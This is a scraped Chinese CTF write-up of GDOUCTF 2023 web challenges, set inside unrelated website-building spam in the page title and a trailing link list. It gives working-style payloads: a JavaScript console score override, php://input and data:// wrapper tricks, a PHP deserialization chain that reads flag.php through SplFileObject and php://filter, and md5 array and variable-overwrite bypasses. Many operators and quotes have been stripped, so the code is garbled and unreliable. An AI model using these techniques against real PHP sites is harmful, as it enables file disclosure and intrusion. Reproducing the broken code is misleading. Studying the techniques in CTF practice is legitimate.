当前位置: 首页 > news >正文

九龙坡建站公司简洁的企业网站源码

九龙坡建站公司,简洁的企业网站源码,西安 企业网站建设,做建网站的工作一年赚几百万[GDOUCTF 2023]hate eat snake 考察#xff1a;js代码审计 打开题目#xff0c;发现需要坚持60秒#xff0c;那么简单的一个思路就是修改得分的变量60即可 办法1#xff1a;修改变量 右键查看源代码#xff0c;之后发现有一个snake.js的文件#xff0c;ctrlf搜索i…[GDOUCTF 2023]hate eat snake 考察js代码审计 打开题目发现需要坚持60秒那么简单的一个思路就是修改得分的变量60即可 办法1修改变量 右键查看源代码之后发现有一个snake.js的文件ctrlf搜索if发现判断过关的条件是getScore60 搜索发现getScore在Snake.prototype中 在控制台执行 payload Snake.prototype.getScore () 61控制台开始调用函数 在游戏界面再按一下空格得到flag 方法2 先玩游得到分数后在放着界面停留60秒再按空格获取flag [GDOUCTF 2023]泄露的伪装 考察目录扫描php伪协议 由于环境打不开了我就根据别人的wp提供下思路 思路打开题目----目录扫描rar文件下载---代码审计---php伪协议inputdata get参数为?cxkphp://input post参数为ctrl 或者使用下面一种  ?cxkdata://text/plain,ctrl[GDOUCTF 2023]反方向的钟  考察反序列化原生类SplFileObject 打开题目发现一大串代码看到类了猜测考察反序列化需要构造poc链 ?php error_reporting(0); highlight_file(__FILE__); // flag.php class teacher{public $name;public $rank;private $salary;public function __construct($name,$rank,$salary 10000){$this-name $name;$this-rank $rank;$this-salary $salary;} }class classroom{public $name;public $leader;public function __construct($name,$leader){$this-name $name;$this-leader $leader;}public function hahaha(){if($this-name ! one class or $this-leader-name ! ing or $this-leader-rank !department){return False;}else{return True;}} }class school{public $department;public $headmaster;public function __construct($department,$ceo){$this-department $department;$this-headmaster $ceo;}public function IPO(){if($this-headmaster ong){echo Pretty Good ! Ctfer!\n;echo new $_POST[a]($_POST[b]);}}public function __wakeup(){if($this-department-hahaha()) {$this-IPO();}} }if(isset($_GET[d])){unserialize(base64_decode($_GET[d])); } ? 分析 能利用原生类SplFileObject读取文件 找到最核心的IPO()关键点new $_POST[‘a’] ($_POST[‘b’]) 可以POST请求利用原生类读取文件获得flag(base64编码) 步骤 要执行IPO()看到__wakeup()下要先执行hahaha() 再找到hahaha()所在的类为classroom要使返回为真三个变量赋值得为对应的值leader指向name和rank的值也就说明$leadernew teacher()发现name和rank是在teacher类那里 构造poc链 ?php class teacher{public $nameing;public $rankdepartment;private $salary; }class classroom{public $nameone class;public $leader; }class school{public $department;public $headmasterong; }$anew school(); $a-departmentnew classroom(); $a-department-leadernew teacher(); echo base64_encode(serialize($a));Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjozOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO3M6MTU6IgB0ZWFjaGVyAHNhbGFyeSI7aToxMDAwMDt9fXM6MTA6ImhlYWRtYXN0ZXIiO3M6Mzoib25nIjt9之后利用原生类SplFileObject读取文件 a为类,b用php协议读取flag.php   /代码中说了flag在flag.php中 所以POST的payload为: aSplFileObjectbphp://filter/readconvert.base64-encode/resourceflag.php 进行访问 得到base64编码我们再进行解码得到flag ?php $flag NSSCTF{c18adac3-acf0-4efa-ab63-10279c78c08d}; ? [GDOUCTF 2023]受不了一点 考察md5绕过强/弱类型比较变量覆盖 打开题目得到源码 ?php error_reporting(0); header(Content-type:text/html;charsetutf-8); if(isset($_POST[gdou])isset($_POST[ctf])){$b$_POST[ctf];$a$_POST[gdou];if($_POST[gdou]!$_POST[ctf] md5($a)md5($b)){if(isset($_COOKIE[cookie])){if ($_COOKIE[cookie]j0k3r){if(isset($_GET[aaa]) isset($_GET[bbb])){$aaa$_GET[aaa];$bbb$_GET[bbb];if($aaa114514 $bbb114514 $aaa!$bbb){$give cancanwordflag;$get hacker!;if(isset($_GET[flag]) isset($_POST[flag])){die($give);}if($_POST[flag] flag || $_GET[flag] flag){die($get);}foreach ($_POST as $key $value) {$$key $value;}foreach ($_GET as $key $value) {$$key $$value;}echo $flag;}else{echo 洗洗睡吧;}}else{echo 行不行啊细狗;}} } else {echo 菜菜; } }else{echo 就这?; } }else{echo 别来沾边; } ? 别来沾边 初步分析我们需要进行四组绕过  if($_POST[gdou]!$_POST[ctf] md5($a)md5($b)) 这里我们需要进行md5绕过并且为强类型比较绕过我们可以考虑用数组绕过也可以用md5碰撞进行绕过 md5()函数无法处理数组如果传入的为数组会返回NULL所以两个数组经过加密后得到的都是NULL,也就是相等的。  例如 a[]1b[]2 gdou[]1ctf[]2 //绕过第一步 这里为简单的cookie赋值我们用火狐浏览器的hackbar插件就能修改cookie的值  if ($_COOKIE[cookie]j0k3r 这里为弱比较类型的绕过我们可以用小数点进行绕过 也可以后面加字符进行绕过 if($aaa114514 $bbb114514 $aaa!$bbb 构造payload aaa114514bbb114514.a 接着下面这里考察的是变量覆盖 if($_POST[flag] flag || $_GET[flag] flag){die($get);}foreach ($_POST as $key $value) {$$key $value;}foreach ($_GET as $key $value) {$$key $$value;}echo $flag; 直接构造payload变色的变量可以改变但与后面的需要相同 123flagflag123 最后抓包构造所有的payload POST /?aaa114514bbb114514a123flagflag123 post参数 gdou[]1ctf[]2 [GDOUCTF 2023]EZ WEB 考察http协议 由于环境开启不了看了下别人的wp讲讲思路 思路右键查看网页源代码---访问有关于flag的路由---BP抓包修改请求方式为POST
http://www.hkea.cn/news/14393748/

相关文章:

  • 著名的设计企业网站网站建设项目实践
  • 网站建设国外拂去其安卓软件开发培训机构
  • 中山市开发区建设局网站建立购物网站 app
  • 济南企业网站厦门住房建设局网站首页
  • 网校网站建设多少钱中国企业大黄页
  • 网站后台不能上传图片字体
  • 俄文网站建设方案天津网站制作培训
  • wordpress postviewsseo交流中心
  • 建站兔软件常见问题专业seo公司
  • 建设一个网站需要学哪些flash源码网站
  • 万网注册域名做简单网站北京网站seo排名
  • 资产负债表在哪个网站可以做dz论坛怎么做视频网站
  • 中国上海网站首页自己做网站nas
  • 做门户网站用什么技术好高端网站建设好处
  • 只做特卖的网站网站建设平台怎么样
  • 河源网站网站建设大连网站排名公司
  • 网站设计制作的服务机构大连在建项目
  • 广西网站建设制作模板设计应考虑哪些荷载
  • 建一个网络商城的网站素材搜集预算是什么济南网站制作建设
  • 做近代史纲要题的网站如何设计一个实验方案
  • 企业网站改版升级重庆卓光科技有限公司
  • 网站内容管理咨询公司注册资本
  • 外贸网站翻译建设服务 好的网站制作
  • 企业门户网站建设情况汇报龙岩云支付推广
  • 手机号码定位网站开发wordpress 首页更换
  • 做美食下载什么网站做图书出版 外国网站
  • 网站设计网站开发优化常州建设网站平台
  • 网站建设中怎么写房产交易网官网
  • 如何建设公司网站知乎苏州相城区做网站公司
  • 博客类网站怎么做做网站最省钱